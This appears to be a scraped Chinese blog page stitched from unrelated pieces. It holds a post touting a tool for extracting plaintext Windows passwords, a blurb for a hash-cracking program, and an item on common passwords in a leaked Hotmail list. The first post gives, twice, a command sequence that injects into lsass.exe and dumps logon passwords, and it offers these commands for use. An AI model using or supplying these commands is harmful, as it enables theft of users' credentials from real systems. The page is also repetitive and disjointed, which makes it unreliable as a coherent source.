可以获取系统密码明文的神器,今天在看雪看到这个东西。文章内容就不转了,原文请参考这里!
获取密码的命令序列:
privilege::debug
inject::process lsass.exe sekurlsa.dll
@getLogonPasswords
可以获取系统密码明文的神器,今天在看雪看到这个东西。文章内容就不转了,原文请参考这里!
获取密码的命令序列:
privilege::debug
inject::process lsass.exe sekurlsa.dll
@getLogonPasswords
This program is designated for the recovery of passwords for different types of hashes. The program currently supports about 30 types of hashes, and new ones can be easily added by creating a custom external hashing DLL-module. The actual list of available modules can be found on the software-related forum. The peak number of hashes the application is capable of working with simultaneously is 256.
大家都知道本周发生一宗重大的 Hotmail 密码外流事件,希望大家都不在名单中,不受影响。(建议大家还是赶快改密码比较好。)不过,不幸的密码泄露事件却透露一些有趣的数据。
外国有人对这些被泄露的密码进行统计分析,结果发现一万多名用户中,最广泛使用的密码是 12345,排名第二是 123456789,其它数字组合包括:12345678、1234567 及 111111 均排名前十。
除此之外,统计还发现密码一般长度为 6 到 9 个字符,平均为 8 个字符。至于最长的密码则有 30个字符,最短只有 1 个字符。不知道你的密码是什么呢?不会是 12345 吧!